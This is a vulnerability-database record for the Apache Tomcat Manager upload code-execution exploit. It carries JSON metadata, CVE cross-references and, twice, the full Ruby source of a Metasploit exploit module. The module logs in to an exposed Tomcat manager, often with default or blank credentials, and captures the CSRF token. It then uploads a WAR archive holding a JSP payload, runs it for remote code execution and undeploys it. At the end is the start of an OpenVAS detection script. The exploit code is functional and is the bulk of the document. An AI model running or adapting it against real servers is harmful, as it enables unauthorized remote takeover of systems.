DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:125021", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Apache Tomcat Manager Code Execution", "description": "", "published": "2014-02-01T00:00:00", "modified": "2014-02-01T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "https://packetstormsecurity.com/files/125021/Apache-Tomcat-Manager-Code-Execution.html", "reporter": "rangercha", "references": [], "cvelist": ["CVE-2009-4188", "CVE-2010-4094", "CVE-2009-3843", "CVE-2010-0557", "CVE-2009-4189", "CVE-2009-3548"], "lastseen": "2016-12-05T22:16:08", "viewCount": 92, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2009-312", "CPAI-2010-134", "CPAI-2010-364"]}, {"type": "cve", "idList": ["CVE-2009-3548", "CVE-2009-3843", "CVE-2009-4188", "CVE-2009-4189", "CVE-2010-0557", "CVE-2010-4094"]}, {"type": "kitploit", "idList": ["KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/TOMCAT_MGR_LOGIN", "MSF:EXPLOIT/MULTI/HTTP/TOMCAT_MGR_DEPLOY", "MSF:EXPLOIT/MULTI/HTTP/TOMCAT_MGR_UPLOAD"]}, {"type": "nessus", "idList": ["TOMCAT_MANAGER_COMMON_CREDS.NASL", "VMWARE_VMSA-2011-0003.NASL", "VMWARE_VMSA-2011-0003_REMOTE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:103454", "OPENVAS:1361412562310103454", "OPENVAS:1361412562310103550", "OPENVAS:1361412562310111013", "OPENVAS:1361412562310800193", "OPENVAS:1361412562310835237", "OPENVAS:1361412562310901050", "OPENVAS:800193", "OPENVAS:835237"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:86448"]}, {"type": "saint", "idList": ["SAINT:0DA3E83ACADF15B0430714C34348CD54", "SAINT:1E5F50E71375DAEB9F5F859C572CF522", "SAINT:4323BB9E55DCFF792582CDFE8B06FEAC", "SAINT:432CEB57E28BB8F1CCBA5539DAF61BF3", "SAINT:5DF2E8BB0ECF29725510E3173971EDE5", "SAINT:627454943189EB0A2BD02D71CE81E15E", "SAINT:7CC6DA9BCE40E1A4453714BA7B40AFF7", "SAINT:88789BF22A82B3B79355F9F1C375C644", "SAINT:94DD62E7D4C2602EDF0704F85789EDD0", "SAINT:9A1ED7FEFFB0C7A0F9E21A50DD99400B", "SAINT:9E88983E6D2E3F9BD58C6DCB531A7E97", "SAINT:B0A1D9F854F22F1DE9F592C0BF728365", "SAINT:C49FD1E788C94DE32BF7E4D34FB252F9", "SAINT:EBB5064D9257E93A49BF25A71D24E1AA", "SAINT:F3AA05B5F208FC7C290557EB7CA70DBF", "SAINT:FA41BCBF61DEF78FB3035ECD0A423296"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22764", "SECURITYVULNS:DOC:22818", "SECURITYVULNS:DOC:22821", "SECURITYVULNS:DOC:23112", "SECURITYVULNS:DOC:23892", "SECURITYVULNS:VULN:10389", "SECURITYVULNS:VULN:10414", "SECURITYVULNS:VULN:10852"]}, {"type": "seebug", "idList": ["SSV:12601", "SSV:14974"]}, {"type": "tomcat", "idList": ["TOMCAT:0B64F54283D152613DC4C77D34E010AF", "TOMCAT:C3A9DD4DC4BB2C17C62CA8202CF2A834"]}, {"type": "zdi", "idList": ["ZDI-09-085"]}, {"type": "zdt", "idList": ["1337DAY-ID-21853"]}], "rev": 4}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2010-364"]}, {"type": "cve", "idList": ["CVE-2009-3548", "CVE-2009-3843", "CVE-2009-4188", "CVE-2009-4189", "CVE-2010-0557"]}, {"type": "kitploit", "idList": ["KITPLOIT:8672599587089685905"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/TOMCAT_MGR_DEPLOY", "MSF:EXPLOIT/MULTI/HTTP/TOMCAT_MGR_UPLOAD"]}, {"type": "nessus", "idList": ["TOMCAT_MANAGER_COMMON_CREDS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103454"]}, {"type": "saint", "idList": ["SAINT:B0A1D9F854F22F1DE9F592C0BF728365"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22764"]}, {"type": "seebug", "idList": ["SSV:14974"]}, {"type": "tomcat", "idList": ["TOMCAT:C3A9DD4DC4BB2C17C62CA8202CF2A834"]}, {"type": "zdi", "idList": ["ZDI-10-214"]}]}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/125021/tomcat_mgr_upload.rb.txt", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } \n \nCSRF_VAR = 'CSRF_NONCE=' \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution', \n'Description' => %q{ \nThis module can be used to execute a payload on Apache Tomcat servers that \nhave an exposed \"manager\" application. The payload is uploaded as a WAR archive \ncontaining a jsp application using a POST request against the /manager/html/upload \ncomponent. \n \nNOTE: The compatible payload sets vary based on the selected target. For \nexample, you must select the Windows target to use native Windows payloads. \n}, \n'Author' => 'rangercha', \n'License' => MSF_LICENSE, \n'References' => \n[ \n# This is based on jduck's tomcat_mgr_deploy. \n# the tomcat_mgr_deploy o longer works for current versions of tomcat due to \n# CSRF protection tokens. Also PUT requests against the /manager/html/deploy \n# aren't allowed anymore. \n \n# There is no single vulnerability associated with deployment functionality. \n# Instead, the focus has been on insecure/blank/hardcoded default passwords. \n \n# The following references refer to HP Operations Manager \n['CVE', '2009-3843'], \n['OSVDB', '60317'], \n['CVE', '2009-4189'], \n['OSVDB', '60670'], \n \n# HP Operations Dashboard \n['CVE', '2009-4188'], \n \n# IBM Cognos Express Default user/pass \n['BID', '38084'], \n['CVE', '2010-0557'], \n['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'], \n \n# IBM Rational Quality Manager and Test Lab Manager \n['CVE', '2010-4094'], \n['ZDI', '10-214'], \n \n# 'admin' password is blank in default Windows installer \n['CVE', '2009-3548'], \n['OSVDB', '60176'], \n['BID', '36954'], \n \n# tomcat docs \n['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html'] \n], \n'Platform' => %w{ java linux win }, # others? \n'Targets' => \n[ \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n} \n], \n# \n# Platform specific targets only \n# \n[ 'Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n[ 'Linux x86', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Nov 09 2009')) \n \nregister_options( \n[ \nOptString.new('USERNAME', [false, 'The username to authenticate as']), \nOptString.new('PASSWORD', [false, 'The password for the specified username']), \n# /cognos_express/manager/ for Cognos Express (19300) \nOptString.new('TARGETURI', [true, \"The URI path of the manager app (/html/upload and /undeploy will be used)\", '/manager']) \n], self.class) \nend \n \ndef check \nres = query_manager \ndisconnect \n \nreturn CheckCode::Unknown if res.nil? \n \nif res.code.between?(400, 499) \nvprint_error(\"#{peer} - Server rejected the credentials\") \nreturn CheckCode::Unknown \nend \n \nreturn CheckCode::Safe unless res.code == 200 \n \n# if res.code == 200 \n# there should be access to the Tomcat Manager and to the status page \nres = query_status \nreturn CheckCode::Unknown unless res \n \nplat = detect_platform(res.body) \narch = detect_arch(res.body) \nreturn CheckCode::Unknown unless plat and arch \n \nvprint_status(\"#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture\") \n \nreport_auth_info( \n:host => rhost, \n:port => rport, \n:sname => (ssl ? \"https\" : \"http\"), \n:user => datastore['USERNAME'], \n:pass => datastore['PASSWORD'], \n:proof => \"WEBAPP=\\\"Tomcat Manager App\\\", VHOST=#{vhost}, PATH=#{datastore['PATH']}\", \n:active => true \n) \n \nreturn CheckCode::Appears \nend \n \ndef exploit \n@app_base = rand_text_alphanumeric(4 + rand(32 - 4)) \n@jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) \n \n# \n# Find the session ID and the CSRF token \n# \nprint_status(\"#{peer} - Retrieving session ID and CSRF token...\") \nunless access_manager? \nfail_with(Failure::Unknown, \"Unable to access the Tomcat Manager\") \nend \n \n# \n# Upload Payload \n# \nprint_status(\"#{peer} - Uploading and deploying #{@app_base}...\") \nif upload_payload \nreport_auth_info( \n:host => rhost, \n:port => rport, \n:sname => (ssl ? \"https\" : \"http\"), \n:user => datastore['USERNAME'], \n:pass => datastore['PASSWORD'], \n:proof => \"WEBAPP=\\\"Tomcat Manager App\\\", VHOST=#{vhost}, PATH=#{datastore['PATH']}\", \n:active => true \n) \nelse \nfail_with(Failure::Unknown, \"Upload failed\") \nend \n \n# \n# Execute Payload \n# \nprint_status(\"#{peer} - Executing #{@app_base}...\") \nunless execute_payload \nfail_with(Failure::Unknown, \"Failed to execute the payload\") \nend \n \n# \n# Get the new CSRF token & session id \n# \nunless access_manager? \nfail_with(Failure::Unknown, \"Unable to access the Tomcat Manager\") \nend \n \n# \n# Delete the deployed payload \n# \nprint_status(\"#{peer} - Undeploying #{@app_base} ...\") \nunless undeploy_app \nprint_warning(\"#{peer} - Failed to undeploy #{@app_base}...\") \nend \nend \n \ndef query_status \npath = normalize_uri(target_uri.path.to_s, 'status') \nres = send_request_raw('uri' => path) \n \nunless res and res.code == 200 \nvprint_error(\"Failed: Error requesting #{path}\") \nreturn nil \nend \n \nreturn res \nend \n \ndef query_manager \npath = normalize_uri(target_uri.path.to_s, '/html') \nres = send_request_raw('uri' => path) \n \nreturn res \nend \n \ndef vars_get \nvars = {} \nunless @csrf_token.nil? \nvars = { \n\"path\" => @app_base, \n\"org.apache.catalina.filters.CSRF_NONCE\" => @csrf_token \n} \nend \n \nreturn vars \nend \n \ndef detect_platform(body) \nreturn nil if body.blank? \n \ni=0 \n \nbody.each_line do |ln| \nln.chomp! \n \ni = 1 if ln =~ /OS Name/ \n \nif i == 9 or i == 11 \nif ln.include? \"Windows\" \nreturn 'win' \nelsif ln.include? \"Linux\" \nreturn 'linux' \nelsif i==11 \nreturn 'unknown' \nend \nend \n \ni = i+1 if i > 0 \nend \nend \n \ndef detect_arch(body) \nreturn nil if body.blank? \n \ni=0 \nbody.each_line do |ln| \nln.chomp! \n \ni = 1 if ln =~ /OS Architecture/ \n \nif i==9 or i==11 \nif ln.include? 'x86' \nreturn ARCH_X86 \nelsif ln.include? 'i386' \nreturn ARCH_X86 \nelsif ln.include? 'i686' \nreturn ARCH_X86 \nelsif ln.include? 'x86_64' \nreturn ARCH_X86 \nelsif ln.include? 'amd64' \nreturn ARCH_X86 \nelsif i==11 \nreturn 'unknown' \nend \nend \n \ni = i + 1 if i > 0 \nend \nend \n \ndef find_csrf(res = nil) \nreturn \"\" if res.blank? \n \nvprint_status(\"#{peer} - Finding CSRF token...\") \n \nbody = res.body \n \nbody.each_line do |ln| \nln.chomp! \ncsrf_nonce = ln.index(CSRF_VAR) \nnext if csrf_nonce.nil? \ntoken = ln[csrf_nonce + CSRF_VAR.length, 32] \nreturn token \nend \n \nreturn \"\" \nend \n \ndef generate_multipart_msg(boundary, data) \n# Rex::MIME::Message is breaking the binary upload when trying to \n# enforce CRLF for SMTP compatibility \nwar_multipart = \"-----------------------------\" \nwar_multipart << boundary \nwar_multipart << \"\\r\\nContent-Disposition: form-data; name=\\\"deployWar\\\"; filename=\\\"\" \nwar_multipart << @app_base \nwar_multipart << \".war\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\" \nwar_multipart << data \nwar_multipart << \"\\r\\n-----------------------------\" \nwar_multipart << boundary \nwar_multipart << \"--\\r\\n\" \nend \n \ndef war_payload \npayload.encoded_war({ \n:app_name => @app_base, \n:jsp_name => @jsp_name, \n:arch => target.arch, \n:platform => target.platform \n}).to_s \nend \n \ndef send_war_payload(url, war) \nboundary_identifier = rand_text_numeric(28) \n \nres = send_request_cgi({ \n'uri' => url, \n'method' => 'POST', \n'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier, \n'user' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'cookie' => @session_id, \n'vars_get' => vars_get, \n'data' => generate_multipart_msg(boundary_identifier, war), \n}) \n \nreturn res \nend \n \ndef send_request_undeploy(url) \nres = send_request_cgi({ \n'uri' => url, \n'vars_get' => vars_get, \n'method' => 'POST', \n'user' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'cookie' => @session_id \n}) \n \nreturn res \nend \n \ndef access_manager? \nres = query_manager \nreturn false unless res and res.code == 200 \n@session_id = res.get_cookies \n@csrf_token = find_csrf(res) \nreturn true \nend \n \ndef upload_payload \nwar = war_payload \nupload_path = normalize_uri(target_uri.path.to_s, \"html\", \"upload\") \nvprint_status(\"#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...\") \nres = send_war_payload(upload_path, war) \nreturn parse_upload_response(res) \nend \n \ndef parse_upload_response(res) \nunless res \nvprint_error(\"#{peer} - Upload failed on #{upload_path} [No Response]\") \nreturn false \nend \n \nif res.code < 200 or res.code >= 300 \nvprint_warning(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\") if res.code == 401 \nvprint_error(\"Upload failed on #{upload_path} [#{res.code} #{res.message}]\") \nreturn false \nend \n \nreturn true \nend \n \ndef execute_payload \njsp_path = normalize_uri(@app_base, \"#{@jsp_name}.jsp\") \n \nvprint_status(\"#{peer} - Executing #{jsp_path}...\") \n \nres = send_request_cgi({ \n'uri' => jsp_path, \n'method' => 'GET' \n}) \n \nreturn parse_execute_response(res) \nend \n \ndef parse_execute_response(res) \nunless res \nvprint_error(\"#{peer} - Execution failed on #{@app_base} [No Response]\") \nreturn false \nend \n \nif res and (res.code < 200 or res.code >= 300) \nvprint_error(\"#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]\") \nreturn false \nend \n \nreturn true \nend \n \ndef undeploy_app \nundeploy_url = normalize_uri(target_uri.path.to_s, \"html\", \"undeploy\") \nres = send_request_undeploy(undeploy_url) \n \nunless res \nvprint_warning(\"#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]\") \nreturn false \nend \n \nif res and (res.code < 200 or res.code >= 300) \nvprint_warning(\"#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]\") \nreturn false \nend \n \nreturn true \nend \n \nend`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659703426}}

{"zdt": [{"lastseen": "2018-01-01T20:59:54", "description": "This Metasploit module can be used to execute a payload on Apache Tomcat servers that have an exposed \"manager\" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.", "cvss3": {}, "published": "2014-02-04T00:00:00", "type": "zdt", "title": "Apache Tomcat Manager Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-4188", "CVE-2010-4094", "CVE-2009-3843", "CVE-2010-0557", "CVE-2009-4189", "CVE-2009-3548"], "modified": "2014-02-04T00:00:00", "id": "1337DAY-ID-21853", "href": "https://0day.today/exploit/description/21853", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }\r\n\r\n CSRF_VAR = 'CSRF_NONCE='\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',\r\n 'Description' => %q{\r\n This module can be used to execute a payload on Apache Tomcat servers that\r\n have an exposed \"manager\" application. The payload is uploaded as a WAR archive\r\n containing a jsp application using a POST request against the /manager/html/upload\r\n component.\r\n\r\n NOTE: The compatible payload sets vary based on the selected target. For\r\n example, you must select the Windows target to use native Windows payloads.\r\n },\r\n 'Author' => 'rangercha',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n # This is based on jduck's tomcat_mgr_deploy.\r\n # the tomcat_mgr_deploy o longer works for current versions of tomcat due to\r\n # CSRF protection tokens. Also PUT requests against the /manager/html/deploy\r\n # aren't allowed anymore.\r\n\r\n # There is no single vulnerability associated with deployment functionality.\r\n # Instead, the focus has been on insecure/blank/hardcoded default passwords.\r\n\r\n # The following references refer to HP Operations Manager\r\n ['CVE', '2009-3843'],\r\n ['OSVDB', '60317'],\r\n ['CVE', '2009-4189'],\r\n ['OSVDB', '60670'],\r\n\r\n # HP Operations Dashboard\r\n ['CVE', '2009-4188'],\r\n\r\n # IBM Cognos Express Default user/pass\r\n ['BID', '38084'],\r\n ['CVE', '2010-0557'],\r\n ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'],\r\n\r\n # IBM Rational Quality Manager and Test Lab Manager\r\n ['CVE', '2010-4094'],\r\n ['ZDI', '10-214'],\r\n\r\n # 'admin' password is blank in default Windows installer\r\n ['CVE', '2009-3548'],\r\n ['OSVDB', '60176'],\r\n ['BID', '36954'],\r\n\r\n # tomcat docs\r\n ['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html']\r\n ],\r\n 'Platform' => %w{ java linux win }, # others?\r\n 'Targets' =>\r\n [\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n }\r\n ],\r\n #\r\n # Platform specific targets only\r\n #\r\n [ 'Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Nov 09 2009'))\r\n\r\n register_options(\r\n [\r\n OptString.new('USERNAME', [false, 'The username to authenticate as']),\r\n OptString.new('PASSWORD', [false, 'The password for the specified username']),\r\n # /cognos_express/manager/ for Cognos Express (19300)\r\n OptString.new('TARGETURI', [true, \"The URI path of the manager app (/html/upload and /undeploy will be used)\", '/manager'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = query_manager\r\n disconnect\r\n\r\n return CheckCode::Unknown if res.nil?\r\n\r\n if res.code.between?(400, 499)\r\n vprint_error(\"#{peer} - Server rejected the credentials\")\r\n return CheckCode::Unknown\r\n end\r\n\r\n return CheckCode::Safe unless res.code == 200\r\n\r\n # if res.code == 200\r\n # there should be access to the Tomcat Manager and to the status page\r\n res = query_status\r\n return CheckCode::Unknown unless res\r\n\r\n plat = detect_platform(res.body)\r\n arch = detect_arch(res.body)\r\n return CheckCode::Unknown unless plat and arch\r\n\r\n vprint_status(\"#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture\")\r\n\r\n report_auth_info(\r\n :host => rhost,\r\n :port => rport,\r\n :sname => (ssl ? \"https\" : \"http\"),\r\n :user => datastore['USERNAME'],\r\n :pass => datastore['PASSWORD'],\r\n :proof => \"WEBAPP=\\\"Tomcat Manager App\\\", VHOST=#{vhost}, PATH=#{datastore['PATH']}\",\r\n :active => true\r\n )\r\n\r\n return CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n @app_base = rand_text_alphanumeric(4 + rand(32 - 4))\r\n @jsp_name = rand_text_alphanumeric(4 + rand(32 - 4))\r\n\r\n #\r\n # Find the session ID and the CSRF token\r\n #\r\n print_status(\"#{peer} - Retrieving session ID and CSRF token...\")\r\n unless access_manager?\r\n fail_with(Failure::Unknown, \"Unable to access the Tomcat Manager\")\r\n end\r\n\r\n #\r\n # Upload Payload\r\n #\r\n print_status(\"#{peer} - Uploading and deploying #{@app_base}...\")\r\n if upload_payload\r\n report_auth_info(\r\n :host => rhost,\r\n :port => rport,\r\n :sname => (ssl ? \"https\" : \"http\"),\r\n :user => datastore['USERNAME'],\r\n :pass => datastore['PASSWORD'],\r\n :proof => \"WEBAPP=\\\"Tomcat Manager App\\\", VHOST=#{vhost}, PATH=#{datastore['PATH']}\",\r\n :active => true\r\n )\r\n else\r\n fail_with(Failure::Unknown, \"Upload failed\")\r\n end\r\n\r\n #\r\n # Execute Payload\r\n #\r\n print_status(\"#{peer} - Executing #{@app_base}...\")\r\n unless execute_payload\r\n fail_with(Failure::Unknown, \"Failed to execute the payload\")\r\n end\r\n\r\n #\r\n # Get the new CSRF token & session id\r\n #\r\n unless access_manager?\r\n fail_with(Failure::Unknown, \"Unable to access the Tomcat Manager\")\r\n end\r\n\r\n #\r\n # Delete the deployed payload\r\n #\r\n print_status(\"#{peer} - Undeploying #{@app_base} ...\")\r\n unless undeploy_app\r\n print_warning(\"#{peer} - Failed to undeploy #{@app_base}...\")\r\n end\r\n end\r\n\r\n def query_status\r\n path = normalize_uri(target_uri.path.to_s, 'status')\r\n res = send_request_raw('uri' => path)\r\n\r\n unless res and res.code == 200\r\n vprint_error(\"Failed: Error requesting #{path}\")\r\n return nil\r\n end\r\n\r\n return res\r\n end\r\n\r\n def query_manager\r\n path = normalize_uri(target_uri.path.to_s, '/html')\r\n res = send_request_raw('uri' => path)\r\n\r\n return res\r\n end\r\n\r\n def vars_get\r\n vars = {}\r\n unless @csrf_token.nil?\r\n vars = {\r\n \"path\" => @app_base,\r\n \"org.apache.catalina.filters.CSRF_NONCE\" => @csrf_token\r\n }\r\n end\r\n\r\n return vars\r\n end\r\n\r\n def detect_platform(body)\r\n return nil if body.blank?\r\n\r\n i=0\r\n\r\n body.each_line do |ln|\r\n ln.chomp!\r\n\r\n i = 1 if ln =~ /OS Name/\r\n\r\n if i == 9 or i == 11\r\n if ln.include? \"Windows\"\r\n return 'win'\r\n elsif ln.include? \"Linux\"\r\n return 'linux'\r\n elsif i==11\r\n return 'unknown'\r\n end\r\n end\r\n\r\n i = i+1 if i > 0\r\n end\r\n end\r\n\r\n def detect_arch(body)\r\n return nil if body.blank?\r\n\r\n i=0\r\n body.each_line do |ln|\r\n ln.chomp!\r\n\r\n i = 1 if ln =~ /OS Architecture/\r\n\r\n if i==9 or i==11\r\n if ln.include? 'x86'\r\n return ARCH_X86\r\n elsif ln.include? 'i386'\r\n return ARCH_X86\r\n elsif ln.include? 'i686'\r\n return ARCH_X86\r\n elsif ln.include? 'x86_64'\r\n return ARCH_X86\r\n elsif ln.include? 'amd64'\r\n return ARCH_X86\r\n elsif i==11\r\n return 'unknown'\r\n end\r\n end\r\n\r\n i = i + 1 if i > 0\r\n end\r\n end\r\n\r\n def find_csrf(res = nil)\r\n return \"\" if res.blank?\r\n\r\n vprint_status(\"#{peer} - Finding CSRF token...\")\r\n\r\n body = res.body\r\n\r\n body.each_line do |ln|\r\n ln.chomp!\r\n csrf_nonce = ln.index(CSRF_VAR)\r\n next if csrf_nonce.nil?\r\n token = ln[csrf_nonce + CSRF_VAR.length, 32]\r\n return token\r\n end\r\n\r\n return \"\"\r\n end\r\n\r\n def generate_multipart_msg(boundary, data)\r\n # Rex::MIME::Message is breaking the binary upload when trying to\r\n # enforce CRLF for SMTP compatibility\r\n war_multipart = \"-----------------------------\"\r\n war_multipart << boundary\r\n war_multipart << \"\\r\\nContent-Disposition: form-data; name=\\\"deployWar\\\"; filename=\\\"\"\r\n war_multipart << @app_base\r\n war_multipart << \".war\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\"\r\n war_multipart << data\r\n war_multipart << \"\\r\\n-----------------------------\"\r\n war_multipart << boundary\r\n war_multipart << \"--\\r\\n\"\r\n end\r\n\r\n def war_payload\r\n payload.encoded_war({\r\n :app_name => @app_base,\r\n :jsp_name => @jsp_name,\r\n :arch => target.arch,\r\n :platform => target.platform\r\n }).to_s\r\n end\r\n\r\n def send_war_payload(url, war)\r\n boundary_identifier = rand_text_numeric(28)\r\n\r\n res = send_request_cgi({\r\n 'uri' => url,\r\n 'method' => 'POST',\r\n 'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier,\r\n 'user' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD'],\r\n 'cookie' => @session_id,\r\n 'vars_get' => vars_get,\r\n 'data' => generate_multipart_msg(boundary_identifier, war),\r\n })\r\n\r\n return res\r\n end\r\n\r\n def send_request_undeploy(url)\r\n res = send_request_cgi({\r\n 'uri' => url,\r\n 'vars_get' => vars_get,\r\n 'method' => 'POST',\r\n 'user' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD'],\r\n 'cookie' => @session_id\r\n })\r\n\r\n return res\r\n end\r\n\r\n def access_manager?\r\n res = query_manager\r\n return false unless res and res.code == 200\r\n @session_id = res.get_cookies\r\n @csrf_token = find_csrf(res)\r\n return true\r\n end\r\n\r\n def upload_payload\r\n war = war_payload\r\n upload_path = normalize_uri(target_uri.path.to_s, \"html\", \"upload\")\r\n vprint_status(\"#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...\")\r\n res = send_war_payload(upload_path, war)\r\n return parse_upload_response(res)\r\n end\r\n\r\n def parse_upload_response(res)\r\n unless res\r\n vprint_error(\"#{peer} - Upload failed on #{upload_path} [No Response]\")\r\n return false\r\n end\r\n\r\n if res.code < 200 or res.code >= 300\r\n vprint_warning(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\") if res.code == 401\r\n vprint_error(\"Upload failed on #{upload_path} [#{res.code} #{res.message}]\")\r\n return false\r\n end\r\n\r\n return true\r\n end\r\n\r\n def execute_payload\r\n jsp_path = normalize_uri(@app_base, \"#{@jsp_name}.jsp\")\r\n\r\n vprint_status(\"#{peer} - Executing #{jsp_path}...\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => jsp_path,\r\n 'method' => 'GET'\r\n })\r\n\r\n return parse_execute_response(res)\r\n end\r\n\r\n def parse_execute_response(res)\r\n unless res\r\n vprint_error(\"#{peer} - Execution failed on #{@app_base} [No Response]\")\r\n return false\r\n end\r\n\r\n if res and (res.code < 200 or res.code >= 300)\r\n vprint_error(\"#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]\")\r\n return false\r\n end\r\n\r\n return true\r\n end\r\n\r\n def undeploy_app\r\n undeploy_url = normalize_uri(target_uri.path.to_s, \"html\", \"undeploy\")\r\n res = send_request_undeploy(undeploy_url)\r\n\r\n unless res\r\n vprint_warning(\"#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]\")\r\n return false\r\n end\r\n\r\n if res and (res.code < 200 or res.code >= 300)\r\n vprint_warning(\"#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]\")\r\n return false\r\n end\r\n\r\n return true\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/21853", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-05-12T17:29:36", "description": "The Apache Tomcat Manager/Host Manager/Server Status is using default or known\n hardcoded credentials.", "cvss3": {}, "published": "2012-08-22T00:00:00", "type": "openvas", "title": "Apache Tomcat Manager/Host Manager/Server Status Default/Hardcoded Credentials", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-4188", "CVE-2010-4094", "CVE-2009-3843", "CVE-2009-3099", "CVE-2010-0557", "CVE-2009-4189", "CVE-2009-3548"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310103550", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103550", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat Manager Remote Unauthorized Access Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103550\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2010-4094\", \"CVE-2009-3548\", \"CVE-2009-4189\", \"CVE-2009-3099\", \"CVE-2009-3843\",\n \"CVE-2009-4188\", \"CVE-2010-0557\");\n script_bugtraq_id(44172, 36954, 79264, 79351, 37086, 36258, 38084);\n 